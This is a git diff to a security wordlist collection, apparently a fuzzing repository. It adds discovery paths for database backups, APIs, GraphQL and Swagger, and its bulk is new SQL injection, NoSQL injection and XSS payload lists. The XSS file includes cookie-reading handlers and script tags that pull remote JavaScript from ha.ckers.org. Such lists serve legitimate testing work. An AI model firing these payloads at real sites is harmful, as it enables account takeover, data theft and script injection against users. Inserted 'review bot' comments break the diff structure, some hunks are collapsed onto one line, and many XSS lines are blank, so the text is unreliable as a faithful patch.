diff --git a/Discovery/Web-Content/Common-DB-Backups.txt b/Discovery/Web-Content/Common-DB-Backups.txt
index c6a096be..244a5ddd 100644
--- a/Discovery/Web-Content/Common-DB-Backups.txt
+++ b/Discovery/Web-Content/Common-DB-Backups.txt
@@ -323,3 +323,14 @@
 /web.sql.gz
 /dbadmin.rar
 /site.sql.tar
+/accounts.sql
+/back.sql
+/backups.sql
+/clients.sql
+/customers.sql
+/data.sql
+/database.sql
+/database.sqlite
+/setup.sql
+/sqldump.sql
+/localhost.sql
diff --git a/Discovery/Web-Content/api/common_paths.txt b/Discovery/Web-Content/api/common_paths.txt
index e7e91f5f..245c9394 100644
--- a/Discovery/Web-Content/api/common_paths.txt
+++ b/Discovery/Web-Content/api/common_paths.txt
@@ -31,5 +31,13 @@
 /api/v1/history/history
 /api/v1/monitoring/accounts
 /api/v1/monitoring/address-check
+/api/v1/swagger.json
+/api/v2/accounts
+/api/v2/users
+/api/v2/spans
+/api/v2/jobs
+/api/v2/tickets
+/api/v2/swagger.json
+/api/v4/projects
 /swagger/
 /api-docs/v1/openapi.json
diff --git a/Discovery/Web-Content/graphql.txt b/Discovery/Web-Content/graphql.txt
index 0afa0ffa..7c7f47f6 100644
--- a/Discovery/Web-Content/graphql.txt
+++ b/Discovery/Web-Content/graphql.txt
@@ -1,12 +1,90 @@
-graphql
-graphql.php
-graphql/console
-graphql/schema.json
-graphql/schema.yaml
-graphql/schema.xml
+altair
+explorer
 graphiql
+graphiql.css
+graphiql/finland
+graphiql.js
 graphiql.min.css
 graphiql.min.js
-graphiql.css
-graphiql.js
+graphiql.php
+graphql
+graphql/console
+graphql-explorer
+graphql.php
+graphql/schema.json
+graphql/schema.xml
+graphql/schema.yaml
+playground
 subscriptions
+v1/altair
+v1/explorer
+v1/graphiql
+v1/graphiql.css
+v1/graphiql/finland
+v1/graphiql.js
+v1/graphiql.min.css
+v1/graphiql.min.js
+v1/graphiql.php
+v1/graphql
+v1/graphql/console
+v1/graphql-explorer
+v1/graphql.php
+v1/graphql/schema.json
+v1/graphql/schema.xml
+v1/graphql/schema.yaml
+v1/playground
+v1/subscriptions
+v2/altair
+v2/explorer
+v2/graphiql
+v2/graphiql.css
+v2/graphiql/finland
+v2/graphiql.js
+v2/graphiql.min.css
+v2/graphiql.min.js
+v2/graphiql.php
+v2/graphql
+v2/graphql/console
+v2/graphql-explorer
+v2/graphql.php
+v2/graphql/schema.json
+v2/graphql/schema.xml
+v2/graphql/schema.yaml
+v2/playground
+v2/subscriptions
+v3/altair
+v3/explorer
+v3/graphiql
+v3/graphiql.css
+v3/graphiql/finland
+v3/graphiql.js
+v3/graphiql.min.css
+v3/graphiql.min.js
+v3/graphiql.php
+v3/graphql
+v3/graphql/console
+v3/graphql-explorer
+v3/graphql.php
+v3/graphql/schema.json
+v3/graphql/schema.xml
+v3/graphql/schema.yaml
+v3/playground
+v3/subscriptions
+v3/altair
+v3/explorer
+v3/graphiql
+v3/graphiql.css
+v3/graphiql/finland
+v3/graphiql.js
+v3/graphiql.min.css
+v3/graphiql.min.js
+v3/graphiql.php
+v3/graphql
+v3/graphql/console
+v3/graphql-explorer
+v3/graphql.php
+v3/graphql/schema.json
+v3/graphql/schema.xml
+v3/graphql/schema.yaml
+v3/playground
+v3/subscriptions
diff --git a/Discovery/Web-Content/raft-large-directories.txt b/Discovery/Web-Content/raft-large-directories.txt
index 5a45bc72..b7f00c21 100644
--- a/Discovery/Web-Content/raft-large-directories.txt
+++ b/Discovery/Web-Content/raft-large-directories.txt
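Review bot: The last 18 added entries in graphql.txt (`v3/altair` through `v3/subscriptions`) repeat the preceding `v3/` block line for line, so the list ships with 18 duplicates and any run over it requests each of those paths twice. The blocks follow a v1, v2, v3 sequence, so the fourth block was presumably meant to carry a different version prefix; either correct the prefix or drop the repeated block. A `sort file | uniq -d` check in CI over the wordlists would catch this kind of mistake before merge.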
@@ -7235,6 +7235,14 @@ your
 98
 emailpopup
 family-notices
+order-pay
+order-received
+add-payment-method
+delete-payment-method
+set-default-payment-method
+edit-account
+edit-address
+customer-logout
 fuseaction
 katsushikaku
 sumidaku
diff --git a/Discovery/Web-Content/swagger.txt b/Discovery/Web-Content/swagger.txt
index 2fa5729a..2f92ab04 100644
--- a/Discovery/Web-Content/swagger.txt
+++ b/Discovery/Web-Content/swagger.txt
@@ -4,6 +4,7 @@
 /swagger-resources
 /swagger/static/index.html
 /swagger-ui/swagger.json
+/swagger/ui/index
 /apidocs/swagger.json
 /api-docs/swagger.json
 /swagger-ui
@@ -11,39 +12,39 @@
 /apidocs
 /swagger
 /v1/swagger.json
-api/apidocs
-api/v1/apidocs
-api/v2/apidocs
-api/api-docs
-api/v1/api-docs
-api/v2/api-docs
-swagger
-swagger/
-swagger.json
-swagger-ui
-swagger-ui.html
-swagger-ui.json
-swagger.yml
-api/swagger
-api/swagger/
-api/swagger.json
-api/swagger-ui
-api/swagger-ui.html
-api/swagger-ui.json
-api/v1/swagger
-api/v1/swagger/
-api/v1/swagger.json
-api/v1/swagger-ui
-api/v1/swagger-ui.html
-api/v1/swagger-ui.json
-api/v2/swagger
-api/v2/swagger/
-api/v2/swagger.json
-api/v2/swagger-ui
-api/v2/swagger-ui.html
-api/v2/swagger-ui.json
-graphql
-api
-api/v1/
-api/v2
-api/v3
+/api/apidocs
+/api/v1/apidocs
+/api/v2/apidocs
+/api/api-docs
+/api/v1/api-docs
+/api/v2/api-docs
+/swagger
+/swagger/
+/swagger.json
+/swagger-ui
+/swagger-ui.html
+/swagger-ui.json
+/swagger.yml
+/api/swagger
+/api/swagger/
+/api/swagger.json
+/api/swagger-ui
+/api/swagger-ui.html
+/api/swagger-ui.json
+/api/v1/swagger
+/api/v1/swagger/
+/api/v1/swagger.json
+/api/v1/swagger-ui
+/api/v1/swagger-ui.html
+/api/v1/swagger-ui.json
+/api/v2/swagger
+/api/v2/swagger/
+/api/v2/swagger.json
+/api/v2/swagger-ui
+/api/v2/swagger-ui.html
+/api/v2/swagger-ui.json
+/graphql
+/api
+/api/v1/
+/api/v2
+/api/v3
\ No newline at end of file
diff --git a/Fuzzing/Databases/NoSQL.txt b/Fuzzing/Databases/NoSQL.txt
index 83ce0d92..ec1d57c7 100644
--- a/Fuzzing/Databases/NoSQL.txt
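Review bot: Prefixing the formerly relative entries with `/` in the second swagger.txt hunk introduces duplicates of lines already in the file: the added `/swagger` and `/swagger-ui` match the unchanged context lines `/swagger` (second hunk) and `/swagger-ui` (first hunk). The new last line `/api/v3` is also left without a trailing newline (`\ No newline at end of file`), so a later append or a concatenation of several lists would fuse it with the following entry. Drop the two repeated entries and end the file with a newline.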
+++ b/Fuzzing/Databases/NoSQL.txt @@ -9,6 +9,7 @@ $where: '1 == 1' db.injection.insert({success:1}); db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 || 1==1 +' || 'a'=='a ' && this.password.match(/.*/)//+%00 ' && this.passwordzz.match(/.*/)//+%00 '%20%26%26%20this.password.match(/.*/)//+%00 diff --git a/Fuzzing/SQLi/quick-SQLi.txt b/Fuzzing/SQLi/quick-SQLi.txt new file mode 100644 index 00000000..7f30bbf1 --- /dev/null +++ b/Fuzzing/SQLi/quick-SQLi.txt @@ -0,0 +1,77 @@ +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 diff --git a/Fuzzing/XSS/XSS-OFJAAAH.txt b/Fuzzing/XSS/XSS-OFJAAAH.txt new file mode 100644 index 00000000..f0f50668 --- /dev/null +++ b/Fuzzing/XSS/XSS-OFJAAAH.txt 
@@ -0,0 +1,2977 @@ +: \');confirm(1);// +prompt(1) + + + + + + + + + + + +javascript:/*--> + +

+ CLICK + +
< + + + + +"> +"> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +\x3Cscript>javascript:alert(1) +'"`> + + +--> --> +--> +--> +--> +`"'>

+
test +test +test +test +test +test +test +test +test +test +test +test +test +test + + +
+ + + + + +">

123

" + +
DEF +"'`>ABC
DEF + + + +'`"><\x3Cscript>javascript:alert(1) +'`"><\x00script>javascript:alert(1) +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> + + + + +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> + + + + +alert(1)0 +
+ + + + +"> +"> +"> +"> + +<% foo> +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +XXX + + + +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo ;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> 
+<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img src=x:x onerror =javascript:alert(1)>"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script 
language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE 
type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> 
+<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +<object onerror=javascript:javascript:alert(1)> +<embed type="image" src=%(scriptlet)s></embed> +<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> +<IMG SRC=&{javascript:alert(1);};> +<a href="javAascript:javascript:alert(1)">test1</a> +<a href="javaascript:javascript:alert(1)">test1</a> +<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> +<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>"> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- +></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<a onmouseover="alert(document.cookie)">xxs link</a> +<a onmouseover=alert(document.cookie)>xxs link</a> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC="  javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT 
SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// + + + + + +